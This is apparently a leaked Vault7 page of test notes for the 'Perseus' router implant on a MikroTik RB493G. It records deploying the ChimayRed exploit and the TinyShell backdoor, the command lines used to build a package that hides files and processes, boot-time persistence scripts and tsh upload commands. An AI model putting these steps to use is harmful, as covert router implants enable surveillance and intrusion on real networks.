Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #14587667
Perseus 1.1.0b1 Mikrotik RB493G - Test Notes
Perseus 1.1.0 Beta 1
MikroTik RB493G
General Info
WAN (from TR-Core) 172.20.100.4/30
TR-CoreSwx: 172.20.100.5 Perseus: 172.20.100.6
TR-Core Switch Route: 192.168.88.0/27 -> 172.20.100.6 (This gives the Perseus LANLocal Area Network 30 host IPs)
ICON-CR: 172.20.12.23/24
LAN Hosts:
192.168.88.2 Perseus Test1 -1.1.0b1 - UbuntuDesktop 14.10 x64
192.168.88.3 Windows 7 VM
4/3/2015
- Changed RB493G ether1 IP to 172.20.100.6/30.
- Changed RB493G ether2 IP to 192.168.88.1/24.
- Default IP: 192.168.88.1/24
- Figure out how to run ChimayRed and TinyShell (TshPatcher).
4/8/2015
- Unable to connect RB493G to Console server. Checked MT website and confirmed settings, but no luck.
- Downloaded and upgraded MT f/w to v6.27
- Move Windows VMVirtual Machine to VLAN-602 (Perseus Internal).
- Use Winbox to upload new f/w. Copy "routeros-mipsbe-6.27.npk" using the Files List window.
- Select System -> Reboot. Once rebooted, the new version number (6.27) will be seen in the Winbox Title.
4/9/2015
Setup TR-Core route to 192.168.88.0/27
ip route 192.168.88.0 255.255.255.224 172.20.100.6 name Perseus-MT_RB493G
- Add default route (0.0.0.0/0 via 172.20.100.5) for MT (IP -> Routes):
- Setup ACLAccess Control List (on TR-Core) to restrict VLANVirtual Local Area Network access (see Access List Configuration section below for settings).
- Configure NATNetwork Address Translation on RS493G using the following rule (IP -> Firewall -> NATNetwork Address Translation):
Delete 'Serial0' port under System -> Console.- Setup NTPNetwork Time Protocol client (System -> SNTP Client):
- Apply ACLs to VLAN601 (Perseus WANWide Area Network)
4/10/2015
- Worked with Bingham to throw ChimayRed and TinyShell on MT RB-493G.
- Here is the order exploits/tools are used operationally:
- Package TinyShell with port, key, architecture, and shell (optional)
- Use ChimayRed to upload exploit (TinyShell) to MT. Requires access to port 8291 and 80.
- Connect to TinyShell. You are now in an encrypted session between ICON and the MT.
- Upload BusyBox and/or Perseus.
- For more specific details refer to the step-by-step guide Chimay Red, TinyShell, and BusyBox Quick Start Guide .
ID | Status | Task |
---|---|---|
3 | complete | User #14587667 Need to get BusyBox binary from Bingham (Make sure I can log into OSN first). |
4 | complete | User #14587667 Use ChimayRed to upload BusyBox on MT. Use COGComputer Operations Group version of BB. |
5 | complete | User #14587667 Review ICON script/notes to flush out instructions above |
4/13/2015
- Reset MT and exploited again using ChimayRed and TinyShell.
- Copied BusyBox binary from OSN to Devlan. Confirmed with Bingham that this is the current version that COG/NOD is using (mips-be version)
- Uploaded BusyBox (COGComputer Operations Group version) to MT using TinyShell.
4/14/2015
ID | Status | Task |
---|---|---|
6 | incomplete |
User #14587667 Finding: I had a TS connection opened and it was sitting idle for a while (maybe about 45 min). When I came back to remote shell, it was hung. Ctrl-C, Ctrl-Z, did not work. Nothing appears when I type. |
7 | complete |
User #14587667 Bug??: After running ./start, I touched a file named /flash/boot/hi.txt and it was not hidden. After re-deploying P it was hidden |
13 | incomplete | User #14587667 Caution: Do not make removal trigger a read-only partition. If so, how do you trigger removal? |
14 | incomplete |
User #14587667 Bug??: Did timestamp of /flash/boot change when Perseus installed? |
15 | complete |
User #14587667 |
16 | incomplete |
- Talked with User #73736 on the phone. Secure delete is kicking and deleting the files Perseus should be hiding. User #73736 needs to research this some more and will get back in touch with me tomorrow.
4/16/2015
- User #73735 requested configuration and log files of the Perseus installation and execution. 2015-04-16_063833-Perseus-Install_Log.log
- User #73736 and User #73735 came over to DD2 and User #73736 worked with me to troubleshoot the MT. It turns out that the kernel had been deleted by secure delete. User #73736 and User #73735 took the MT back with them to TP to perform further analysis.
4/27/2015
- Re-configured MT with WAN, LAN, NATNetwork Address Translation settings. Device had been bricked and was reset by TP.
ID | Status | Task |
---|---|---|
21 | incomplete | User #14587667 Is this a CR bug?? If so, does it need to be reported? Error when throwing CR |
22 | complete |
User #14587667 Shouldn't this be hidden. It was built with this command "python perseus_1.1.0.0b1_routeros6_mips.zip -f /flash/boot/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /tmp/tshd-mipsbe -d /flash/boot/hidden -d /tmp/tshd-mipsbe -S /flash/boot/hidden/start -s 1 -m /flash/boot/hidden/mcc.ko -r /tmp/dont_panic deploy" Resolution: I spoke with User #73736 and Perseus hides the absolute path. In this case /tmp is a symlink to /rw/tmp and /rw/tmp is a symlink to /flash/rw/tmp. So /tmp is a symlink to /flash/rw/tmp. The full path needed to hide /tmp/tshd-mipsbe is actually /flash/rw/tmp/tsh-mipsbe. |
4/28/2015
- Spoke with User #73736 to troubleshoot why /tmp/tshd-mipsbe is not hidden when running "ps ax" (Notes under 4/27/2015).
- Refer to "2015-04-28_110134-Perseus-ICON_window1 TS process not hidden w new command" for logs.
ID | Status | Task |
---|---|---|
26 | complete |
User #14587667 Determine how to make TS startup after reboot. User #73736 suggested placing a startup script in /flash/etc/rc.d/run.d/S99tsh which will launch TS. Also need to upload TS to /flash/boot/hidden (/tmp is not persistent). |
4/29/2015
- Created startup script to make tsh persistent (/flash/etc/rc.d/run.d/S99tsh).
- Although tsh is not hidden when run from /tmp/tshd-mipsbe, it is hidden when it is run from /flash/boot/hidden/tshd-mipsbe (after reboot).
- Current parameters used to generate perseus:
python perseus_1.1.0.0b1_routeros6_mips.zip -f /flash/boot/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /flash/etc/rc.d/run.d/S99tsh -d /flash/boot/hidden -p /flash/rw/tmp/tshd-mipsbe -S /flash/boot/hidden/start -s 1 -m /flash/boot/hidden/mcc.ko -r /flash/boot/hidden/dont_panic deploy
ID | Status | Task |
---|---|---|
27 | complete | User #14587667 When a process is started and then the originating binary is deleted (the process is still running), Perseus does not hide it. |
5/4/2015
- Put together step by step instructions for TP to replicate bug PS-1.
5/5/2015
ID | Status | Task |
---|---|---|
28 | incomplete | User #14587667 Check these counters when using Perseus to see if it affects the counters |
Notes
- Perseus only deletes files/directories that are specified to be hidden.
- If secure delete is not used, but mcc is revereted manually (using /tmp/busybox rmmod mcc) ...
- To hide an executable, the absolute path to the binary must be specified using the -p option. The MT uses many symlinks (ie. /tmp is a symlink for /flash/rw/tmp), so be sure to determine the absolute path. You can use the "readlink -f <path>" command to show the absolute path.
Install Perseus
ID | Status | Task |
---|---|---|
20 | incomplete | User #14587667 Update these steps. for current instructions, refer to \\10.9.8.21\share\Testing\Perseus 1.1.0b1\2015-04-15 Perseus Commands.txt |
- Copy perseus_1.1.0_routers6_mips.zip to ICON VM.
- Build the installation package
$ python perseus_1.1.0.0b1_routeros6_mips.zip -f /flash/boot -f /tmp/busybox2 -d /flash/boot -d /flash/data -S /flash/boot/start -s 1 -m /flash/boot/mcc.ko -r /tmp/dont_panic deploy - Create /tmp/hidden directory on MT.
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase
# mkdir /tmp/hidden
# exit - Upload Perseus to MT. The prerequisites for this include CR, TS, and BB (optional).
From ICON, execute the commands:
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/mcc.ko /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/S99mcc /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 172.20.100.6 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/start /flash/boot - Make "start" executable
# chmod +x /tmp/perseus/start - Start Perseus implant
# /flash/boot/start
Useful MT commands:
Command | Description |
---|---|
/ip route print | Print list of IP addresses configured for router |
/system console print | Display list of console ports |
/port print | Check if application is using port |
/port print detail | Display port settings (baud, data rate, etc) |
/system serial-terminal serial0 | Connect to serial port |
Access List Configuration
Create ACL
ip access-list ext Perseus-WAN
permit ip host 172.20.100.6 host 172.20.12.23
deny ip any any log
show access-list
Apply ACLAccess Control List to VLAN
int vlan 601
ip access-group Perseus-WAN in
show access-list Perseus-WAN
Add statement to ACLAccess Control List and resequence
ip access-list ext Perseus-WAN
15 permit ip host 172.20.100.6 host 172.20.100.5
ip access-list resequence Perseus-WAN 10 10
Show Access List hits
show log | inc list Perseus-WAN
Areas to test
ID | Status | Task |
---|---|---|
8 | incomplete | stapmer.py |
def parse_args(self, args):
# XXX TODO Bounds checks
# XXX Add checking for os version file, mcc, hide_files
ID | Status | Task |
---|---|---|
9 | incomplete | Network latency |
Decreate network latency <40%
ID | Status | Task |
---|---|---|
10 | incomplete | File remnants after Perseus removal |
11 | incomplete | Running processes ("ps ax") |
12 | incomplete | bouncing VMVirtual Machine / restarting networking service |
17 | incomplete | change MTU |
18 | incomplete | change latency |
19 | incomplete | Check available disk space (does it change after implanted?) |